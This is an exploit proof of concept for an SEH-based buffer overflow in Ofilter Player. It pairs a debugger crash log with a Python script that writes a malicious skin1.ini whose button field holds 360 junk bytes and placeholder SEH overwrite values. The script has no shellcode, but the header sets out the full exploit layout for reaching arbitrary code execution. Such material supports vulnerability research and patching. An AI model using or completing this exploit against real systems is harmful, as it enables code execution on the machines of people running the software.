# Exploit Title : Ofilter Player Version - (skin1.ini) - SEH Based Buffer Overflow PoC # Date : 12-09-2013 # Exploit Author : gunslinger_ # Author Homepage : http://www.cr0security.com # Software Link : http://download.cnet.com/Ofilter-Player/3000-2139_4-78232.html # Price : Free to try; $19.99 to buy # Version : (Probably old version of software and the LATEST version too) # Vendor : DigitByte Studio # Vendor Homepage : http://www.008soft.com/ # Tested on : Windows XP SP3 #============================================================================================ # Ofilter Player is Prone to a SEH based Buffer Overflow which allows attacker to execute arbitary code on the victim's machine. # To trigger the vulnerability the attacker must rewrite file skin1.ini inside /skin folder on Ofilter Player installed folder. # Then run Ofilter Player, and EIP will be overwritten with the SEH address when the program initialize to read variable from skin1.ini file (see debug result below). # The Exploit will look like this : [Junk "A" x 360] [6 Bytes Jump + 2Nops ] [pop pop ret address / others] [Shellcode] . # Crash Triggered + Seh Overwritten . #============================================================================================ #!/usr/bin/python ''' 0:000> g ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll (658.3f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0000018c ebx=00000000 ecx=41414141 edx=0012df77 esi=00000171 edi=00000171 eip=0040161d esp=0012ddc4 ebp=0012df08 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 image00400000+0x161d: 0040161d 8b41f4 mov eax,dword ptr [ecx-0Ch] ds:0023:41414135=???????? 0:000> g (658.3f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=bbbbbbbb edx=7c9032bc esi=00000000 edi=00000000 eip=bbbbbbbb esp=0012d9f4 ebp=0012da14 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 bbbbbbbb ?? ??? 0:000> !exchain 0012da08: ntdll!ExecuteHandler2+3a (7c9032bc) 0012df54: bbbbbbbb Invalid exception stack at cccccccc ''' from struct import pack filename = "skin1.ini" junk = "\x41" * 360 nextSEH = "\xcc\xcc\xcc\xcc" SEH = "\xbb\xbb\xbb\xbb" trigger_seh = junk + nextSEH + SEH ini_content = """[BACKGROUND] Mask=GoldMask.bmp Main=GoldMain.bmp Selected=GoldSelected.bmp Over=GoldOver.bmp Disabled=GoldDisable.bmp [BUTTON] 1=ID_FILE_EXIT,273,10,9,9,Exit,FALSE 2=ID_BUTTON_MINIMIZE,261,10,9,9,MINIMIZE,FALSE 3=IDC_BUTTON1_FILELIST_LOOP,229,85,42,21,FILE,FALSE 4=ID_JUMP_FORWARD,103,91,16,15,Skip Forward,FALSE 5=ID_PLAYBACK_NEXTCHAPTER,119,91,16,15,Next,FALSE 6=ID_PLAYBACK_PREVIOUSCHAPTER,23,91,16,15,Previous,FALSE 7=ID_PLAYBACK_STOP,86,91,17,15,Stop,FALSE 8=ID_PLAYBACK_PAUSE,71,91,15,15,Pause,FALSE 9=ID_PLAYBACK_PLAY,53,91,18,15,Play,FALSE 10=ID_JUMP_BACKWARD,38,91,15,15,Skip Backward,FALSE 11=ID_FILE_SELECTDISC,145,85,41,21,Open Media Files,FALSE 12=ID_WEBSITE,117,8,69,16,Website,FALSE 13=%s,186,85,42,21,Open VCD,FALSE 14=ID_POPUP_HELP,251,10,9,9,Popup,FALSE [TRACKBARINFO] 1=IDC_SLIDER1_PLAYBACK_POSITION,Goldbutton1.bmp,Goldbutton1.bmp,23,69,247,6,H,100 2=IDC_SLIDER1_VOLUME,Goldbutton2.bmp,Goldbutton2.bmp,23,79,113,6,H,100 [PLAY] 1=ID_PLAYBACK_TIME,Arial,TRUE,TRUE,-14,32768,100,43,160,16, 2=PLAY,Arial,TRUE,TRUE,-14,32768,34,43,50,16,10""" % (trigger_seh) textfile = open(filename , 'wb') textfile.write(ini_content) textfile.close()